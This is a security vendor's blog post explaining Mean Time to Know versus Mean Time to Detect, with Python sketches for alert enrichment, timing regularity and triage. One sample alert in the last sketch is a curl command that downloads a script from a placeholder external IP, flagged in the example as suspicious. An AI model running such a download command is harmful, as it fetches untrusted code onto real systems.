Mean Time to Know (or MTTK for short) is one of the most important metrics in security operations. It measures how efficient the security team is at detecting real threats. The shorter it is, the sooner you will catch an attack in progress and be able to put a stop to it, reducing the negative consequences for your organization.
But the reality is, it’s not so easy to reduce MTTK. For starters, security teams are barraged with alerts on a daily basis, requiring manual work to sift through the noise to find a signal that indicates a real issue. Add on all the other tasks that need to be done aside from alert investigations, and it’s seemingly impossible to get ahead.
This is where automation comes in. Automation not only eliminates the need to manually handle tedious tasks (like alert response); it also helps you optimize your existing resources, freeing your team to actually focus on MTTK and get it under control.
In this post, we’ll take a closer look at what MTTK is (and isn’t) and how you can leverage automation to effectively decrease it.
The Difference Between Mean Time to Detect and Mean Time to Know
For starters, let’s be sure we’re on the same page when we’re talking about MTTK. It’s not the same as Mean Time To Detect (or Mean Time to Detection, sometimes abbreviated as MTTD), which is another common security metric.
Mean Time To Detection measures how quickly you can identify something and generate an alert. It reflects how fast you’re alerted when something suspicious happens anywhere in your cloud or on-premises environment. Today, most security tools keep MTTD low, so you probably receive alerts pretty quickly.
Mean Time To Know, on the other hand, measures how fast someone can sort signal from noise when they get an alert. Now, you can probably see why this number is a lot harder to make an impact on. It’s like seeing how fast you can find a tiny needle in a haystack. Next to impossible, right? With automation, however, you can make a serious impact on MTTK, bringing it down from hours or days to minutes or seconds. (For a great account of how Threat Stack went from installing an agent to detecting and remediating a security breach in less than five minutes, have a look at this post: From Agent Install to Mean Time to Know in Less Than 5 Minutes.)
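To make the distinction concrete, here is a minimal sketch of how the two metrics could be computed from incident timestamps. It assumes MTTD runs from the moment an event occurs to the moment the alert fires, and MTTK runs from the alert to the moment an analyst decides whether it is real. The incident data and the `mean_minutes` helper are hypothetical and only there for illustration.

```python
from datetime import datetime
from statistics import mean

def mean_minutes(intervals):
    """Average a list of timedeltas and return the result in minutes."""
    return mean(td.total_seconds() for td in intervals) / 60

# Hypothetical incidents: (event occurred, alert fired, analyst knew real vs. noise)
incidents = [
    (datetime(2024, 1, 1, 9, 0), datetime(2024, 1, 1, 9, 1), datetime(2024, 1, 1, 11, 1)),
    (datetime(2024, 1, 2, 14, 0), datetime(2024, 1, 2, 14, 3), datetime(2024, 1, 2, 18, 3)),
]

# MTTD: how long the tooling took to raise the alert.
mttd = mean_minutes([alerted - occurred for occurred, alerted, _ in incidents])
# MTTK: how long it took to sort signal from noise once the alert arrived.
mttk = mean_minutes([known - alerted for _, alerted, known in incidents])

print(f"MTTD: {mttd:.1f} min, MTTK: {mttk:.1f} min")
```

With this sample data the alerts arrive within a few minutes, while knowing whether they matter takes hours, which is the gap automation is meant to close.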
Let’s dive into a few aspects of security automation that will allow you to do this.
If you’re running on AWS, chances are you’re familiar with abuse complaint emails or notifications about scanning. These fire when an EC2 instance is observed scanning another server. The instance owner is alerted, but the details are likely to be scant. They may tell you a little, but they probably won’t give you enough context to investigate and respond.
In the face of an alert — an abuse complaint or otherwise — you need to know three things:
- What? What was the cause of the alert? A malicious actor? An employee mistake?
- Who? Which specific user or system triggered the alert?
- Why? Why did this happen? Was it a routine update that caused it, or has the system been compromised?
Manually investigating and enriching alerts with this kind of detail can take up significant time and drive your MTTK up. Automation, on the other hand, can reduce MTTK by providing you with the what, who, and why of an alert, because it gathers the relevant data for you so you don’t need to spend time digging through logs and reports.
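As a rough illustration of what automated enrichment means, the sketch below attaches a what, who, and why to a bare alert by looking up process activity on the same host. Everything here is hypothetical: the `EnrichedAlert` type, the `enrich` function, and the event fields are assumptions made for the example and do not represent any product's API.

```python
from dataclasses import dataclass

@dataclass
class EnrichedAlert:
    rule: str
    host: str
    what: str = "unknown"  # the command that triggered the alert
    who: str = "unknown"   # the user that ran it
    why: str = "unknown"   # the parent process that started it

def enrich(alert, process_events):
    """Attach what/who/why from the first process event on the alerting host."""
    for ev in process_events:
        if ev["host"] == alert["host"]:
            return EnrichedAlert(
                rule=alert["rule"],
                host=alert["host"],
                what=ev["command"],
                who=ev["user"],
                why=f"started by {ev['parent']}",
            )
    # No matching activity found: return the alert with unknown context.
    return EnrichedAlert(rule=alert["rule"], host=alert["host"])

# Hypothetical alert and process activity.
alert = {"rule": "outbound port scan", "host": "web-01"}
events = [
    {"host": "db-01", "user": "postgres", "command": "pg_dump", "parent": "cron"},
    {"host": "web-01", "user": "deploy", "command": "nmap -sS 10.0.0.0/24", "parent": "bash"},
]

enriched = enrich(alert, events)
print(enriched)
```

A real pipeline would also match on a time window around the alert. The point is only that the lookup happens before a person opens the alert.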
Threat Stack, as an example, provides you with the following information for every alert:
- Relevant network activity that shows you who did what.
- A TTY timeline so you can rewind and see exactly what happened.
- A process tree so you can see how and why the attack happened.
The moment Threat Stack alerts you to something suspicious, you can log into your dashboard and see everything you need to know on one screen. You don’t need to spend time hopping between systems and guessing at what happened; it’s all there for you to act on in near real time. And because we’ve correlated all of this information for you, you can be far more confident that it’s a real issue requiring further attention and not just another false positive.
Another piece of the puzzle when determining whether a threat is real is understanding if similar behavior has happened in the past or not. This goes beyond baselining, where you can see what activity is dubbed “normal” for your specific environment. Especially in the cloud, things are always changing, so to know if an alert is truly anomalous or not, you need to know how similar alerts have been triggered in the past.
For instance, Threat Stack will show you when the same command was run in a certain period of time (e.g., seven days). With this data, you can quickly see whether the command is running differently now than it has in the past, indicating that there may be a real issue at hand.
Or, if you see activity spread evenly over time at regular intervals, it’s probably updates or automated activity your development team has set up. However, if you see suspicious activity at irregular intervals, it may be malware or a bad actor attempting to get in.
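One simple way to express the regular-versus-irregular check is to measure how much the gaps between runs of a command vary. The sketch below uses the coefficient of variation of those gaps. The `interval_regularity` function, the sample timestamps, and the 0.5 cutoff are assumptions chosen for illustration, not a description of how any particular product scores activity.

```python
from datetime import datetime
from statistics import mean, pstdev

def interval_regularity(timestamps):
    """Return the coefficient of variation of the gaps between sorted timestamps.

    Values near 0 mean evenly spaced runs; larger values mean irregular spacing.
    Returns None when there is too little history to judge.
    """
    ordered = sorted(timestamps)
    gaps = [(b - a).total_seconds() for a, b in zip(ordered, ordered[1:])]
    if len(gaps) < 2 or mean(gaps) == 0:
        return None
    return pstdev(gaps) / mean(gaps)

# Hypothetical seven-day history: a nightly job at 02:00.
scheduled = [datetime(2024, 1, day, 2, 0) for day in range(1, 8)]

# Hypothetical bursts of the same command at unpredictable times.
bursty = [
    datetime(2024, 1, 1, 2, 0),
    datetime(2024, 1, 1, 2, 1),
    datetime(2024, 1, 1, 2, 2),
    datetime(2024, 1, 5, 17, 30),
    datetime(2024, 1, 5, 17, 31),
]

IRREGULAR_THRESHOLD = 0.5  # assumed cutoff; tune against your own environment

for name, history in [("scheduled", scheduled), ("bursty", bursty)]:
    cv = interval_regularity(history)
    label = "irregular" if cv is not None and cv > IRREGULAR_THRESHOLD else "regular"
    print(name, label)
```

An irregular result is not proof of an attack. It is a prompt to look closer, and the cutoff needs to reflect what is normal for your environment.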
This automated analysis takes very little time, so you can quickly figure out:
- Whether the activity is normal (not a threat) or abnormal (probably a threat).
- What was impacted (everything or a subset of systems, applications, or users).
- Whether the activity occurs regularly (e.g., automated activity) or is an isolated incident.
Without automation, it can take hours or even days to dig into dozens of systems, endpoint tools, and servers to complete forensic analysis. And this process in and of itself is riddled with roadblocks and issues — the most notable being that you may not have access to all of these systems (and if your organization follows a least privilege policy, you probably don’t).
Past + Present Data = Real Threat Verification
At the end of the day, you need to be able to combine real-time, contextual data with historical data to determine if a threat is real. This is next to impossible to do manually. If malware pivots in your console, for example, it would be very difficult to detect that manually, and certainly not in real time. So contextual and historical data must be collected and analyzed in parallel, and the only practical way to do that and correlate the two is through automation.
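The idea of combining present context with past behavior can be sketched as a small triage function. This is a deliberately simplified illustration: the `verify` function, the field names (`user`, `command`, `tty`), the verdict labels, and the `min_seen` threshold are all hypothetical.

```python
from collections import Counter

def verify(alert, history, min_seen=3):
    """Combine live context with how often the same (user, command) pair ran before."""
    seen = Counter((h["user"], h["command"]) for h in history)
    count = seen[(alert["user"], alert["command"])]
    # Context signal: a TTY means someone typed the command interactively.
    interactive = alert.get("tty") is not None

    if count >= min_seen and not interactive:
        return "likely routine"      # seen often, and run non-interactively
    if count == 0 and interactive:
        return "investigate first"   # never seen before, typed by a person
    return "needs review"            # mixed signals

# Hypothetical history: a deploy job that runs apt-get regularly.
history = [{"user": "deploy", "command": "apt-get update"}] * 5

routine = verify({"user": "deploy", "command": "apt-get update", "tty": None}, history)
novel = verify({"user": "www-data", "command": "curl http://203.0.113.5/x.sh", "tty": "pts/0"}, history)
print(routine, "|", novel)
```

Neither signal settles the question on its own. The verdict comes from reading them together, and that correlation is the part that is hard to do by hand.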
Fight Automation With Automation
Today, many attacks are automated. It’s never been easier to spin up a new malicious domain and send out batches of phishing emails, or to rent a botnet made up of thousands of computers. In fact, many schemes like ransomware are now being franchised, so with a little coding know-how, anyone can join the party. With attacks coming at us faster and in higher volumes than ever before, the only way to keep up and stay protected is by leveraging automation.